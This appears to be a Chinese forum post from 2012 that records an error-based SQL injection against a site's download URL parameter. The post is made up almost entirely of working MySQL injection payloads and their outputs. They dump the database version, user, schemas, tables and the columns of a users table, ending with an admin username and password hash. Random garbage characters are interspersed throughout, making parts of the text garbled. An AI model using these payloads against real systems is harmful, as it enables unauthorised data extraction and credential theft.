http://www.wooyun.org/bugs/wooyun-2010-01666' N. ?( i3 Y1 F5 ^* _
, F8 R5 s1 I' z
之前想找个测试 没想到这有 可以测试下做个记录而已 - |' {: t/ a/ V8 i+ x I5 D
% O4 @# q2 Z) Y$ Hhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003% v# Q. `7 ?3 x7 n% i$ s
+ J0 G, V! h r5 r/data0/htdocs/leqi_new/app/myapp.php0 y4 \( _% m" d& S3 o; E
; {8 z, I7 @1 Z0 g8 W% j+ `, @, }* g
或者. V! y% W d4 Z; ]+ M+ V+ G
* ?( B) p8 `% O/ g
/**********version()**********/ 5.1.49-log' l4 I( V: A5 K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: _/ n; C2 K; ?- s; ^2 o& S% T
; ]" y4 t/ C' |/**********user()**********/ 8 l0 m+ g6 t4 ]3 s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' }- x$ F, ~% M$ H, Z: S- @ x! l$ ]% v# r
/**********database()**********/ leqi" l, {( F" G: K4 j0 j
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; ?& ~& x, ^- A' Q0 X' C6 W( b+ g8 L! H4 n# J3 @3 J/ e9 S
/**********limit依次递归爆库**********/' }8 d3 S8 s9 }9 D& K5 J) i' K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# @/ e. Q; Y+ J7 z; A
information_schema
7 n9 A6 H' h8 Y8 g% @% H; w& yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 s% Y' ^! d0 U. U- r" g4 b
leqi
, w! B) _+ y0 j0 nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# w8 A. B0 ^" N$ D: t: ntest; P6 K5 J4 [/ f( r" \
/ o5 ?; `! w ~* B3 x3 Q) |
/**********limit依次递归爆表名**********// q- T) W# S: m4 Z$ ~# U4 f1 i. e
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 A! H6 \( j0 c ]9 l* g( husers
1 U- s7 x6 H2 }4 t: R2 v: [7 ^* s1 S( V) y: m! X
/**********limit依次递归爆字段名**********/: s: {. B4 R& U/ k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- }: H1 k' u; f$ V- D: U+ vuser_id,username,nickname,passwd,group_id _% E% }2 b0 o ^* k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" E: s4 r" ? L. l( D% K; I
/wapc/5000_0005_003
: O! a8 e% w# @11 21
9 S( D3 W$ j1 \- y( P T+ `- yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 |$ P0 K$ [* E3 z$ w, M5 m8 z% j/wapc/5000_0005_003
, h1 M) `* ^6 |% o- y11 341 351 361
$ T% I. |, E9 J/ j0 S, t6 R/**********爆数据**********/7 h& C; P" r4 X+ b! k* y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) h: Q4 O! p. }& \ ?; Badmin2 x/ [$ w3 c0 ]# C1 T+ o' [ Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' k! F+ o, }: ]8 ?0 ]6a8b4574ca231eb8bd52764d4978ffcd0 E. V' L9 u2 `* o
4 [! i8 a7 M/ _+ M1 ~ 6 l1 ]; x8 J# R! e
|
发表于 2012-9-13 17:52:09
收藏
支持
反对